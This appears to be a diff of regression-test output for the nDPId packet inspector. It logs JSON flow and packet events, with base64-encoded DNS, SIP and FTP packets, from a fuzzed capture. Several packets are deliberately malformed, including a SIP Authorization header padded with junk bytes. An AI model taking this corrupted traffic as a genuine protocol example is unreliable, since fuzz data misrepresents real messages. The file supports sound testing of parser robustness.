00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1120469590256,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469590256,"pkt":"ADBUADRWAODtAW69CABFAABEaaAAAIARTbXAqAECwKgBAQqcADUAMHpPqtMAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1120469590256,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469590256,"pkt":"ADBUADRWAODtAW69CABFAABEaaAAAIARTbXAqAECwKgBAQqcADUAMHpPqtMAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590256,"flow_last_seen":1120469590256,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469590256,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469590257,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590257,"flow_last_seen":1120469590257,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1120469590257,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":9587,"dst_port":156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1120469590257,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":65,"thread_ts_msec":1120469590257,"pkt":"AODtAW69ADBUADRWCABFAABVAABAAEARtz7AqAEBwKgBAiVzAJwAx1zLqtOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00532{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1120469590257,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":65,"thread_ts_msec":1120469590257,"pkt":"AODtAW69ADBUADRWCABFAABVAABAAEARtz7AqAEBwKgBAiVzAJwAx1zLqtOAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
01263{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":722,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":722,"pkt_l4_len":0,"thread_ts_msec":1120469590257,"pkt":"ADBUADRWAODtAW69KABFAALEaaEAAIARFsjAqAEC1PIhIxPEE8QCsIioUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhVyBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFsY2g9ejloRzRiS25wMTQ5NTA1MTc4LTQzOGM1MjhiMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPThlOTQ4YjANClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4PjEuMjo1MDYwO2xpbmU8OWM3ZDJkYmQ4ODIyMDHhYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDY5IFJFR0lTVEVSDQpDb250ZW50LUxlbmd0aDogMA0KQXV0aG9yaXphdGlvbjogRGlnZXMlcwBzZXJuYW1lPSJ2b2mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01249{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":722,"pkt_type":10240,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":722,"pkt_l4_len":0,"thread_ts_msec":1120469590257,"pkt":"ADBUADRWAODtAW69KABFAALEaaEAAIARFsjAqAEC1PIhIxPEE8QCsIioUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhVyBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFsY2g9ejloRzRiS25wMTQ5NTA1MTc4LTQzOGM1MjhiMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPThlOTQ4YjANClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4PjEuMjo1MDYwO2xpbmU8OWM3ZDJkYmQ4ODIyMDHhYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDY5IFJFR0lTVEVSDQpDb250ZW50LUxlbmd0aDogMA0KQXV0aG9yaXphdGlvbjogRGlnZXMlcwBzZXJuYW1lPSJ2b2mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240,"global_ts_msec":1120469590259} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":30,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":10240,"global_ts_msec":1120469590259}
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00858{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1120469590405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1120469590405,"pkt":"AODtAW69ADBUADRWCABFAAFOAABAADcRit\/Q8iEjwKgBAhPEE8QBOln2U0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDQ2VxOiA2OSBSRUdJU1RFUg0KRnJvbTogPHNpcEZ2b2kxODA2M0DzaXAuY3liZXJjaXR5LmRrPjt0YWc9OGU5NDhiMA0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz4NClacYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7cmVjZWl2ZWQ9ODAuMjMwLjIxOS43MDtycG9ydD01MDYwO2JyYW5jaD16OWhHNGJLbnAxNDk1MDUxNzhTNDM4YzUyOGIxOTIuMTY4LjEuMg0KQ29udGVudC1MZW5ndGg6IDANCg0K"} 00858{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1120469590405,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1120469590405,"pkt":"AODtAW69ADBUADRWCABFAAFOAABAADcRit\/Q8iEjwKgBAhPEE8QBOln2U0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDQ2VxOiA2OSBSRUdJU1RFUg0KRnJvbTogPHNpcEZ2b2kxODA2M0DzaXAuY3liZXJjaXR5LmRrPjt0YWc9OGU5NDhiMA0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz4NClacYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7cmVjZWl2ZWQ9ODAuMjMwLjIxOS43MDtycG9ydD01MDYwO2JyYW5jaD16OWhHNGJLbnAxNDk1MDUxNzhTNDM4YzUyOGIxOTIuMTY4LjEuMg0KQ29udGVudC1MZW5ndGg6IDANCg0K"}
00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469590405,"flow_last_seen":1120469590405,"flow_idle_time":180000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":0,"thread_ts_msec":1120469590405,"l3_proto":"ip4","src_ip":"208.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
@@ -85,28 +85,28 @@
00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}} 00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="}
00380{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"AODtAW69ADBUADRWCABVAAAweP9AADkGcTeT6gH9wKgBAgAVCqDlH5UEr53DEHASYzbQ8AAAAQEEAgIEBYM="} 00366{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"AODtAW69ADBUADRWCABVAAAweP9AADkGcTeT6gH9wKgBAgAVCqDlH5UEr53DEHASYzbQ8AAAAQEEAgIEBYM="}
00209{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469634896} 00195{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469634896}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"ADBUADRWAODtAW69CABFAAAoaa1eAIAGOZHAqAECk+oB\/QqgABWvncMQ5R+VBVAQQiQelgAA"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"ADBUADRWAODtAW69CABFAAAoaa1eAIAGOZHAqAECk+oB\/QqgABWvncMQ5R+VBVAQQiQelgAA"}
00229{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1120469634896} 00215{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1120469634896}
00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1120469634993,"pkt":"AODtAW4UADBUADRWCABFEABeeQBAADkGcPiT6gH9wKgBAgAVCqDlH5UFr53DEFAYYzaF6QAAMjIwIFByb0ZUUEQgU2VydmVyIEluIEVDSSBUZWxlY29tIChudHAsZWNpdGVsZS5jQ20pIA0K"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1120469634993,"pkt":"AODtAW4UADBUADRWCABFEABeeQBAADkGcPiT6gH9wKgBAgAVCqDlH5UFr53DEFAYYzaF6QAAMjIwIFByb0ZUUEQgU2VydmVyIEluIEVDSSBUZWxlY29tIChudHAsZWNpdGVsZS5jQ20pIA0K"}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1120469634993,"pkt":"ADBUADRWAODtAW69CABFAAA4aa5AAIAGOYDAqAECk+oB\/QqgABWvncNQ5R+VO1AYQe6WoQAAnlNFUiBhbm9ueW1vdXMNCg=="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1120469634993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1120469634993,"pkt":"ADBUADRWAODtAW69CABFAAA4aa5AAIAGOYDAqAECk+oB\/QqgABWvncNQ5R+VO1AYQe6WoQAAnlNFUiBhbm9ueW1vdXMNCg=="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120469635010,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635010,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":1,"thread_ts_msec":1120469635010,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.169.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1120469635010,"pkt":"AOBzAW69ADBUADRWCABFEAB0eQJAADkGcOCT6gH9wKkBAgAVCqDlH5U7r53DIFAYYzZecwAAMzMxIEFub255bW91cyBsb2dpbiBvaywgc2VuZCB5b3VyIGNvbXBsZXRlIGVtYWlsIGFkZHJlc3Mg4XMgeW91ciBwYXNzd29yZC4NCg=="} 00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1120469635010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":1120469635010,"pkt":"AOBzAW69ADBUADRWCABFEAB0eQJAADkGcOCT6gH9wKkBAgAVCqDlH5U7r53DIFAYYzZecwAAMzMxIEFub255bW91cyBsb2dpbiBvaywgc2VuZCB5b3VyIGNvbXBsZXRlIGVtYWlsIGFkZHJlc3Mg4XMgeW91ciBwYXNzd29yZC4NCg=="}
